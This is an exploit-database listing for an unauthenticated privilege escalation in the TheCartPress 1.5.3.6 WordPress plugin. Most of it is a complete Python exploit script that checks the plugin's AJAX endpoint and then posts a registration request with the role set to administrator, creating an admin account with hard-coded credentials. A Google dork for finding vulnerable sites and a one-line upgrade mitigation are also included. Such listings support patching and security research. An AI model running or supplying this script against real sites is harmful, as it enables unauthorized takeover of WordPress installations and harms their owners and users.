header-logo
Suggest Exploit
vendor:
TheCartPress
by:
spacehen
7,5
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: TheCartPress
Affected Version From: 1.5.3.6
Affected Version To: 1.5.3.6
Patch Exists: YES
Related CWE: N/A
CPE: a:thecartpress:thecartpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 20.04.1
2021

WordPress Plugin TheCartPress 1.5.3.6 – Privilege Escalation (Unauthenticated)

TheCartPress <= 1.5.3.6 is vulnerable to unauthenticated privilege escalation. An attacker can exploit this vulnerability by sending a POST request to the /wp-admin/admin-ajax.php endpoint with the action parameter set to tcp_register_and_login_ajax. This will create an administrator account with the credentials specified in the request. This vulnerability can be exploited without authentication.

Mitigation:

Upgrade to the latest version of TheCartPress.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
	print("Author -> space_hen (www.github.com/spacehen)")
	
def print_usage():
	print("Usage: python3 exploit.py [target url]")
	print("Ex: python3 exploit.py https://example.com")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text
	if ("User name is required" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 2):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]

	ajax_action = 'tcp_register_and_login_ajax'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	data = {
	"tcp_new_user_name" : "admin_02",
	"tcp_new_user_pass" : "admin1234",
	"tcp_repeat_user_pass" : "admin1234",
	"tcp_new_user_email" : "test@test.com",
	"tcp_role" : "administrator"
	}
	print("Inserting admin...");
	response = requests.post(uri, data=data )
	if (response.text == "\"\""):
		print("Success!")
		print("Now login at /wp-admin/")
	else:
		print(response.text)

main();

Navigation

Suggest Exploit

Services By CQR